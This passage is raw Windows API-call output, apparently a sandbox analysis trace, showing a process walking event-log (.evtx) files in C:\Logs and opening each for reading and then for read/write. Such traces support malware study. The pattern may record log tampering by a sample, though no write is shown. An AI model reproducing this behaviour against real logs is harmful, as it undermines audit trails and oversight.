dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0071.654] AreFileApisANSI () returned 1 [0071.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x820e8 [0071.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 65 [0071.654] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000)) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0071.654] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.654] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.654] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0071.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0071.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.655] AreFileApisANSI () returned 1 [0071.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpUsedDefaultChar=0x0) returned 64 [0071.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0071.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.656] AreFileApisANSI () returned 1 [0071.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0071.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0071.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=64 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 64 [0071.656] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.657] GetFileType (hFile=0x410) returned 0x1 [0071.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0071.658] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.658] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.658] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.658] CloseHandle (hObject=0x410) returned 1 [0071.658] AreFileApisANSI () returned 1 [0071.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0071.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0071.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=64 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 64 [0071.659] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.659] GetFileType (hFile=0x410) returned 0x1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0071.659] CloseHandle (hObject=0x410) returned 1 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.660] AreFileApisANSI () returned 1 [0071.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=64 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 64 [0071.660] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0071.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.660] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0071.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0071.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0071.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0071.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0071.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.661] AreFileApisANSI () returned 1 [0071.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.661] AreFileApisANSI () returned 1 [0071.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 58 [0071.661] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.662] GetFileType (hFile=0x410) returned 0x1 [0071.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.662] CloseHandle (hObject=0x410) returned 1 [0071.662] AreFileApisANSI () returned 1 [0071.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0071.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 58 [0071.663] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.663] GetFileType (hFile=0x410) returned 0x1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.663] CloseHandle (hObject=0x410) returned 1 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.663] AreFileApisANSI () returned 1 [0071.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 58 [0071.664] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, 